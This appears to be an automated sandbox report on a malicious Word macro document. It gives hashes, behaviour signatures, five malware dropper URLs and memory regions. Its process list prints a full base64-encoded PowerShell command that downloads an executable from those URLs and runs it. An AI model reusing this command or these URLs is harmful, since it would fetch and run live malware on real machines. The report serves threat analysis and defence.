Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    17/05/2024, 09:34

General

  • Target

    4f5e3e5c2686e023091577d75f0613e1_JaffaCakes118.doc

  • Size

    196KB

  • MD5

    4f5e3e5c2686e023091577d75f0613e1

  • SHA1

    f4a7e99729f2a7e3b533d509af57129a39ebd490

  • SHA256

    f04e93ec6a33e431a50f791ba2b2c643cdc1d68604c348088b11af1a6904ff72

  • SHA512

    dda804ca601c6390fe33f366784329dd3ba7261757b0c47de959c77a2e1b112e74e210abb37bd883920463ca7fdddb73b68587c9ff554ca658f9fff6426932a5

  • SSDEEP

    3072:j3fLfrryIeszS1cN2XuF5n9lZpkgCppOHhKOQ9UOyAv3:jvLXyI3ntF5nzZhCvOHhKOSUva

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mantra4change.com/wp-content/uploads/C5UDxJh/

exe.dropper

http://peteroszlik.com/dist/KFP4imImNO/

exe.dropper

http://13.127.49.76/demo/0tyYvxJi/

exe.dropper

http://www.gym.marvin.tech/wp-content/rmsJlXm/

exe.dropper

http://79.137.39.145:8080/wordpress/wp-content/uploads/Ecu6NxP/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4f5e3e5c2686e023091577d75f0613e1_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersHeLl.exe
      powersHeLl -e JABvADgAXwBfADEAOQBfADMAPQAoACcARwBfAF8AJwArACcANAAyADgAJwApADsAJABkADEAMQAzADgAOQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAXwA2ADEAMgBfAD0AKAAnAGgAdAB0ACcAKwAnAHAAOgAnACsAJwAvAC8AbQBhAG4AdAByAGEANABjACcAKwAnAGgAYQBuACcAKwAnAGcAZQAuAGMAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvAG4AdABlACcAKwAnAG4AdAAvAHUAJwArACcAcAAnACsAJwBsAG8AYQBkAHMALwAnACsAJwBDADUAVQBEAHgAJwArACcASgBoAC8AJwArACcAQABoAHQAdABwADoAJwArACcALwAvAHAAZQAnACsAJwB0AGUAcgAnACsAJwBvAHMAegBsAGkAawAnACsAJwAuAGMAbwBtAC8AZABpAHMAdAAvACcAKwAnAEsARgAnACsAJwBQADQAaQAnACsAJwBtAEkAJwArACcAbQBOAE8AJwArACcALwBAAGgAdAB0AHAAOgAnACsAJwAvAC8AMQAzACcAKwAnAC4AMQAyACcAKwAnADcAJwArACcALgA0ADkALgA3ADYAJwArACcALwBkAGUAbQBvAC8AMAB0AHkAWQB2AHgASgAnACsAJwBpAC8AJwArACcAQABoAHQAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AZwB5AG0ALgBtAGEAcgB2AGkAbgAnACsAJwAuACcAKwAnAHQAZQBjAGgALwB3AHAALQAnACsAJwBjAG8AbgB0AGUAbgB0AC8AcgBtAHMASgBsAFgAJwArACcAbQAvAEAAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwAnACsAJwA3ADkAJwArACcALgAxADMANwAuADMAJwArACcAOQAuADEANAAnACsAJwA1ADoAOAAwADgAMAAvAHcAJwArACcAbwByACcAKwAnAGQAcAByAGUAJwArACcAcwBzAC8AdwAnACsAJwBwACcAKwAnAC0AYwBvAG4AdAAnACsAJwBlAG4AdAAnACsAJwAvACcAKwAnAHUAcABsAG8AYQAnACsAJwBkAHMAJwArACcALwAnACsAJwBFACcAKwAnAGMAdQA2AE4AeAAnACsAJwBQAC8AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARwAzAF8ANQBfADAANwAzAD0AKAAnAG8AXwBfADgANQAnACsAJwA4ACcAKwAnADAAJwApADsAJABrADgAMwA5ADMAXwAgAD0AIAAoACcAOQA2ACcAKwAnADgAJwApADsAJABOAF8AMABfADEANABfAD0AKAAnAFkAJwArACcANgAnACsAJwBfAF8ANAAwACcAKQA7ACQAUwA3AF8AXwA2AF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGsAOAAzADkAMwBfACsAKAAnAC4AJwArACcAZQB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATwBfADQANgA4ADkAIABpAG4AIAAkAGEAXwA2ADEAMgBfACkAewB0AHIAeQB7ACQAZAAxADEAMwA4ADkAXwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABPAF8ANAA2ADgAOQAsACAAJABTADcAXwBfADYAXwApADsAJABaAF8AMwA1AF8ANAAzADcAPQAoACcAZgA4ACcAKwAnADgAMAAyAF8AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAUwA3AF8AXwA2AF8AKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABTADcAXwBfADYAXwA7ACQAUAA4ADMANQA4AF8AXwA9ACgAJwBMADIAXwAwAF8AJwArACcAXwAnACsAJwA5ADIAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFAANwAwADcANQBfAF8APQAoACcAbABfADUAXwAnACsAJwBfADAAJwApADsA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3040

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            7522b34d640cd45d5ffdb588b2e191f9

            SHA1

            9257466502f7a547f1db429e223326d8a2940211

            SHA256

            85bda17119a01dd3206af4f5c12a0059ff86f0048947e4db65802b29aefedece

            SHA512

            dfa50f3fd35a9971e15068dd84836dcacfa4c24ef5fabb6cd2e0ee010ddb23f7f5929f5377404cd7599b2e453d0dfc46a995b0f96c58852bc9b993b6ad16259b

          • memory/1752-26-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-43-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-8-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-9-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-11-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-10-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-12-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-13-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-14-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-15-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-16-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-17-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-42-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-0-0x000000002F981000-0x000000002F982000-memory.dmp

            Filesize

            4KB

          • memory/1752-2-0x0000000070DFD000-0x0000000070E08000-memory.dmp

            Filesize

            44KB

          • memory/1752-61-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-78-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-60-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-51-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-69-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-34-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-25-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-24-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/1752-117-0x0000000070DFD000-0x0000000070E08000-memory.dmp

            Filesize

            44KB

          • memory/1752-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1752-94-0x0000000070DFD000-0x0000000070E08000-memory.dmp

            Filesize

            44KB

          • memory/1752-95-0x0000000000500000-0x0000000000600000-memory.dmp

            Filesize

            1024KB

          • memory/3040-85-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

            Filesize

            32KB

          • memory/3040-84-0x000000001B870000-0x000000001BB52000-memory.dmp

            Filesize

            2.9MB